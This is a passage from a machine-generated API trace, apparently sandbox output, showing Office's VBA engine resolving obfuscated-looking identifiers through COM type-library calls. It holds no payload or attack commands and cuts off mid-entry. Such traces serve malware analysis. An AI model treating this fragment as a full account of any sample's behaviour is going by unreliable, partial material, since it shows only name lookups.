pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.522] IUnknown:Release (This=0x665ba50) returned 0xb [0068.522] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.522] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="uAwZw1", lHashVal=0x10dc06, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.523] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.523] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.523] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="uAwZw1", lHashVal=0x10dc06, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.523] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.523] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.523] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="uAwZw1", lHashVal=0x10dc06, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.523] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.523] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2bd2, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="uAwZw1") returned 7 [0068.523] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="uAwZw1", lHashVal=0x10dc06, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.523] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0068.523] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3ba2bd2 | out: _Dst=0x67c2d40) returned 0x0 [0068.523] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_uAwZw1") returned 0x105670 [0068.523] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="vABooUQ", cchCount1=-1, lpString2="_B_var_uAwZw1", cchCount2=-1) returned 3 [0068.523] strcpy_s (in: _Dst=0x144fb0, _DstSize=0xe, _Src="_B_var_uAwZw1" | out: _Dst="_B_var_uAwZw1") returned 0x0 [0068.523] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=14, lpWideCharStr=0x144e00, cchWideChar=14 | out: lpWideCharStr="_B_var_uAwZw1") returned 14 [0068.523] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.523] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_uAwZw1", lHashVal=0x105670, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.523] IUnknown:Release (This=0x665ba50) returned 0xb [0068.523] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.523] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_uAwZw1", lHashVal=0x105670, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.523] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.523] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.523] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_uAwZw1", lHashVal=0x105670, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.523] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.523] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.523] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_uAwZw1", lHashVal=0x105670, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.523] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.523] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.523] IUnknown:Release (This=0x665ba50) returned 0xb [0068.523] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc208a, cbMultiByte=14, lpWideCharStr=0x144e60, cchWideChar=15 | out: lpWideCharStr="_B_var_uAwZw1") returned 14 [0068.523] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_uAwZw1", lHashVal=0x105670, wFlags=0x3, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x75005f00720061, ppTypeComp=0x77005a00000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x75005f00720061, ppTypeComp=0x77005a00000000, pDummy=0x0) returned 0x0 [0068.524] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x7, _Src=0x3ba2bd2 | out: _Dst=0x145020) returned 0x0 [0068.524] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x67c2d40) returned 0x0 [0068.524] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Hex") returned 0x1055b0 [0068.524] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.524] IUnknown:Release (This=0x665ba50) returned 0xb [0068.524] IUnknown:AddRef (This=0xaf0b528) returned 0x4 [0068.524] IUnknown:Release (This=0xaf0b528) returned 0x3 [0068.524] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f8 | out: ppvObject=0x1450f8*=0x0) returned 0x80004002 [0068.524] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f0 | out: ppvObject=0x1450f0*=0x0) returned 0x80004002 [0068.524] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0068.524] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x144930, pIndex=0x0 | out: ppTLib=0x144930*=0x665ba50, pIndex=0x0) returned 0x0 [0068.524] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144940, pDummy=0x0 | out: ppTLibAttr=0x144940, pDummy=0x0) returned 0x0 [0068.524] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.524] IUnknown:Release (This=0x665ba50) returned 0xb [0068.524] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x144930, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.524] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.524] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144930, pbstrName=0x0, pwOrdinal=0x144950 | out: pBstrDllName=0x144930*=0x0, pbstrName=0x0, pwOrdinal=0x144950*=0x4bc0) returned 0x0 [0068.524] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000) returned 0x0 [0068.524] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0068.524] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0068.524] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0068.524] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.524] IUnknown:Release (This=0x665ba50) returned 0xb [0068.524] IUnknown:AddRef (This=0xaf0b528) returned 0x4 [0068.524] IUnknown:Release (This=0xaf0b528) returned 0x3 [0068.524] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f8 | out: ppvObject=0x1450f8*=0x0) returned 0x80004002 [0068.525] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f0 | out: ppvObject=0x1450f0*=0x0) returned 0x80004002 [0068.525] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0068.525] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x144930, pIndex=0x0 | out: ppTLib=0x144930*=0x665ba50, pIndex=0x0) returned 0x0 [0068.525] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144940, pDummy=0x0 | out: ppTLibAttr=0x144940, pDummy=0x0) returned 0x0 [0068.525] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.525] IUnknown:Release (This=0x665ba50) returned 0xb [0068.525] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x144930, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.525] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.525] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144930, pbstrName=0x0, pwOrdinal=0x144950 | out: pBstrDllName=0x144930*=0x0, pbstrName=0x0, pwOrdinal=0x144950*=0x4bc0) returned 0x0 [0068.525] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000) returned 0x0 [0068.525] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0068.525] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0068.525] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0068.525] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.525] IUnknown:Release (This=0x665ba50) returned 0xb [0068.525] IUnknown:AddRef (This=0xaf0b528) returned 0x4 [0068.525] IUnknown:Release (This=0xaf0b528) returned 0x3 [0068.525] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f8 | out: ppvObject=0x1450f8*=0x0) returned 0x80004002 [0068.525] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f0 | out: ppvObject=0x1450f0*=0x0) returned 0x80004002 [0068.525] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0068.525] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x144930, pIndex=0x0 | out: ppTLib=0x144930*=0x665ba50, pIndex=0x0) returned 0x0 [0068.525] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144940, pDummy=0x0 | out: ppTLibAttr=0x144940, pDummy=0x0) returned 0x0 [0068.525] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.525] IUnknown:Release (This=0x665ba50) returned 0xb [0068.526] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x144930, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.526] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.526] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144930, pbstrName=0x0, pwOrdinal=0x144950 | out: pBstrDllName=0x144930*=0x0, pbstrName=0x0, pwOrdinal=0x144950*=0x4bc0) returned 0x0 [0068.526] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000) returned 0x0 [0068.526] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4980000 [0068.526] IUnknown:AddRef (This=0xaf0b6e0) returned 0x4 [0068.526] IUnknown:Release (This=0xaf0b6e0) returned 0x3 [0068.526] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f8 | out: ppvObject=0x1450f8*=0x0) returned 0x80004002 [0068.526] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f0 | out: ppvObject=0x1450f0*=0x0) returned 0x80004002 [0068.527] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144930, pIndex=0x0 | out: ppTLib=0x144930*=0x665ba50, pIndex=0x0) returned 0x0 [0068.527] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144940, pDummy=0x0 | out: ppTLibAttr=0x144940, pDummy=0x0) returned 0x0 [0068.527] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.527] IUnknown:Release (This=0x665ba50) returned 0xb [0068.527] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x144930, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.527] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.527] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144930, pbstrName=0x0, pwOrdinal=0x144950 | out: pBstrDllName=0x144930*=0x0, pbstrName=0x0, pwOrdinal=0x144950*=0x4bc0) returned 0x0 [0068.527] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000) returned 0x0 [0068.527] IUnknown:AddRef (This=0xaf0b6e0) returned 0x4 [0068.527] IUnknown:Release (This=0xaf0b6e0) returned 0x3 [0068.527] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f8 | out: ppvObject=0x1450f8*=0x0) returned 0x80004002 [0068.527] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f0 | out: ppvObject=0x1450f0*=0x0) returned 0x80004002 [0068.527] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144930, pIndex=0x0 | out: ppTLib=0x144930*=0x665ba50, pIndex=0x0) returned 0x0 [0068.527] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144940, pDummy=0x0 | out: ppTLibAttr=0x144940, pDummy=0x0) returned 0x0 [0068.527] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.527] IUnknown:Release (This=0x665ba50) returned 0xb [0068.527] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x144930, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.527] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.527] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144930, pbstrName=0x0, pwOrdinal=0x144950 | out: pBstrDllName=0x144930*=0x0, pbstrName=0x0, pwOrdinal=0x144950*=0x4bc0) returned 0x0 [0068.527] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000) returned 0x0 [0068.527] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2b32, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="DGQZDAD") returned 8 [0068.528] ITypeComp:RemoteBind (in: This=0x665ba60, szName="DGQZDAD", lHashVal=0x104f58, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.528] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2b32, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="DGQZDAD") returned 8 [0068.528] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="DGQZDAD", lHashVal=0x104f58, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.528] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2b32, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="DGQZDAD") returned 8 [0068.528] ITypeComp:RemoteBind (in: This=0x665bd30, szName="DGQZDAD", lHashVal=0x104f58, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.528] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DGQZDAD") returned 0x104f58 [0068.528] strcpy_s (in: _Dst=0x144e00, _DstSize=0x8, _Src="DGQZDAD" | out: _Dst="DGQZDAD") returned 0x0 [0068.528] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=8, lpWideCharStr=0x144c50, cchWideChar=8 | out: lpWideCharStr="DGQZDAD") returned 8 [0068.528] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.528] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="DGQZDAD", lHashVal=0x104f58, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.528] IUnknown:Release (This=0x665ba50) returned 0xb [0068.528] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.528] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="DGQZDAD", lHashVal=0x104f58, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.528] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.528] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.528] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="DGQZDAD", lHashVal=0x104f58, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.528] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.528] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.528] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="DGQZDAD", lHashVal=0x104f58, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.528] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.528] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2b32, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="DGQZDAD") returned 8 [0068.528] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="DGQZDAD", lHashVal=0x104f58, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.528] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0068.528] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3ba2b32 | out: _Dst=0x67c2d40) returned 0x0 [0068.529] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_DGQZDAD") returned 0x1052dc [0068.529] strcpy_s (in: _Dst=0x144fb0, _DstSize=0xf, _Src="_B_var_DGQZDAD" | out: _Dst="_B_var_DGQZDAD") returned 0x0 [0068.529] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=15, lpWideCharStr=0x144e00, cchWideChar=15 | out: lpWideCharStr="_B_var_DGQZDAD") returned 15 [0068.529] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.529] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_DGQZDAD", lHashVal=0x1052dc, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.529] IUnknown:Release (This=0x665ba50) returned 0xb [0068.529] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.529] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_DGQZDAD", lHashVal=0x1052dc, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.529] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.529] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.529] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_DGQZDAD", lHashVal=0x1052dc, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.529] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.529] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.529] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_DGQZDAD", lHashVal=0x1052dc, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.529] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.529] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.529] IUnknown:Release (This=0x665ba50) returned 0xb [0068.529] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc20ba, cbMultiByte=15, lpWideCharStr=0x144e60, cchWideChar=16 | out: lpWideCharStr="_B_var_DGQZDAD") returned 15 [0068.529] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_DGQZDAD", lHashVal=0x1052dc, wFlags=0x5, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x44005f00720061, ppTypeComp=0x44005a00000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x44005f00720061, ppTypeComp=0x44005a00000000, pDummy=0x0) returned 0x0 [0068.529] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x8, _Src=0x3ba2b32 | out: _Dst=0x145020) returned 0x0 [0068.529] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2c22, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="hAXAAAAX") returned 9 [0068.529] ITypeComp:RemoteBind (in: This=0x665ba60, szName="hAXAAAAX", lHashVal=0x1083db, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.529] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2c22, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="hAXAAAAX") returned 9 [0068.529] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="hAXAAAAX", lHashVal=0x1083db, wFlags=0x3, 